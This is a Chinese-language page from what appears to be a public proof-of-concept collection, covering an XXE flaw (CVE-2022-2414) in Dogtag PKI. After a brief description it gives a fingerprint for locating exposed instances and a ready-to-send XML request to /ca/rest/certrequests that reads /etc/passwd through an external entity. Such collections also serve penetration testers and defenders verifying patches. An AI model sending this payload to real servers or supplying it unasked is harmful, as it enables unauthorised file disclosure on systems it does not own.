admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Dogtag PKI XML实体注入漏洞 CVE-2022-2414.md

39 lines
827 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Dogtag PKI XML实体注入漏洞 CVE-2022-2414
## 漏洞描述
Dogtag PKI 的XML解析器存在安全漏洞该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 XXE 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。
## 漏洞影响
```
Dogtag PKI
```
## 网络测绘
```
title="Identity Management"
```
## 漏洞复现
登录页面
![image-20221024101747499](images/202210241017604.png)
验证POC
```
POST /ca/rest/certrequests
Content-Type: application/xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>
```
![image-20221024101759219](images/202210241017273.png)
Reference in New Issue Copy Permalink